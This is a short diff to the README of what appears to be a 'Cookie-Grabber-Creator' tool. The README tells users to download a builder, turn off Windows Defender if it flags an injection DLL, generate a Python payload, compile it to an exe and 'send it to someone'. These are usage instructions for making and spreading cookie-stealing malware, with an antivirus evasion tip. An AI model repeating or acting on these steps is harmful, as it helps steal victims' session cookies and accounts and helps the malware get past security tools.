H4cking-Esentials/Cookie-Grabber-Creator/README.md

 ### Instructions:
 - Download the zip (it shouldn't get flagged by defender but if it does just disable it; it's because of the injection.dll that I created most likely)
 - Unzip it and run the app
-- Enter your information and then just press create
+- Enter your desired information and then just press create
 - After it creates you can just compile the python file into an exe and just send it to someone

 # Update Logs (Just Updated!)